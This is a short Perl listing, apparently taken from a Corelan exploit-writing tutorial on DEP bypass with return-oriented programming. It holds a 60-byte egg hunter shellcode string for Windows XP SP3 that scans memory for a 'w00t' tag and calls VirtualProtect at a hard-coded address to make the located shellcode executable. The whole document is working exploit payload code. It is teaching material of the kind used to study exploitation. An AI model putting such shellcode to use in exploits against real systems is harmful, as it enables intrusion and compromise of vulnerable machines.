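# Source: https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
#-------------------------------------------------------------------
#corelanc0d3r - egg hunter which will mark shellcode loc executable
#size to mark as executable : 300 bytes
#writeable location : 10035005
#XP SP3
#-------------------------------------------------------------------
use strict;
use warnings;

# Raw byte string, 60 bytes in total. Every value below is reproduced
# verbatim from the original listing. The addresses embedded in it are
# hard-coded for the platform named in the header above (XP SP3) and
# are not expected to be valid on any other build or service pack.
my $egghunter =
    "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
    "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
    "\x77\x30\x30\x74".                    # w00t (the tag, ASCII "w00t")
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF". # no more jmp edi at the end
    # VirtualProtect
    "\x68\x05\x50\x03\x10\x31\xc0\x04".
    "\x40\x50\x05\xbf\xff\xff\x7f\x2d".
    "\xff\xfc\xff\x7f\x50\x57\x57\x68".
    "\xd4\x1a\x80\x7c\xc3";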